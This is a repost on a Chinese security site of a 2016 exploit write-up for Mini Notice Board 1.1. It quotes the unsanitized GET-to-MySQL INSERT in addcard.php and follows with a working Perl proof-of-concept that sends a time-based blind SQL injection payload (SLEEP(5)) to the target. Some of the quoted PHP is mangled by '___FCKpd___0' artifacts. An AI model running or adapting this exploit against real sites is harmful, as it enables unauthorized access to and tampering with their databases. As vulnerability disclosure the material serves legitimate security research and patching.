Mini Notice Board 1.1 SQL Injection

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Mini Notice Board 1.1 SQL Injection

来源：N_A[at]tutanota.com 作者：N_A 发布时间：2016-11-04

#!/usr/bin/perl -w

#mininoticeboard_v1.1 SQL Injection Exploit
#==========================================


#Discovered by N_A , N_A[at]tutanota.com
#========================================


#Vendor has been notified
#=========================


#Description
#============

#Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car 
#or lawnmower or want to provide services, they can simply write a card. 
#It supports unlimited Regions.

#https://sourceforge.net/projects/mininoticeboard/


#Vulnerability
#=============

#addcard.php:

#The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection

#$title       = ___FCKpd___0
GET["title"];
#$body        = ___FCKpd___0
GET["body"];
#$contact     = ___FCKpd___0
GET["contact"];
#$address     = ___FCKpd___0
GET["address"];
#$tel         = ___FCKpd___0
GET["tel"];
#$date_day    = date("d");
#$date_month  = date("m");
#$date_year   = date("y");
#$romovalcode = genremovalcode();
#$categorie   = $cid;

#if($title!="" && $body!="" && $tel!="" && $contact!="")

#{

#	include 'dbconnect.php';
#	$sqlset["tablename"] = $sqlset["tableprefix"].'content';
#	mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (\''.$title.'\', \''.$body.'\', \''.$contact.'\', \''.$address.'\', \''.$tel.'\', \''.$date_day.'\',  
#\''$date_month.'\', \''.$date_year.'\', \''.$romovalcode.'\', \''.$categorie.'\')') or $status = 'red';




#Proof Of Concept Exploit attached below

#N_A, N_A[at]tutanota.com




use strict;
use LWP::Simple;


my ($url) = @ARGV;
if( not defined $url )
{	
	
   print "=========================================\n";
   print "Mini Notice Board SQL Injection Exploit\n";
   print "\tBy N_A\n";
   print "\n";
   print "___FCKpd___0  [URL]\n";
   print "___FCKpd___0 127.0.0.1/mininoticeboard\n";
   print "=========================================\n";
   exit;
}


my $file = '/addcard.php';                                   #The Vulnerable .php file
my $injection = 'title=pentest&body=blah\' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND \'OKSG\'=\'OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card'; 


my $request ="http://".$url.$file."?".$injection;             #Forming the exploit string
my $content = get $request;
die "Could not get $request" unless defined $content;

#It should hang here for about 5 seconds..... (SLEEP(5)) as per injection

print "##########################\n";
print "SQL Injection Successful!\n";
print "##########################\n"

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告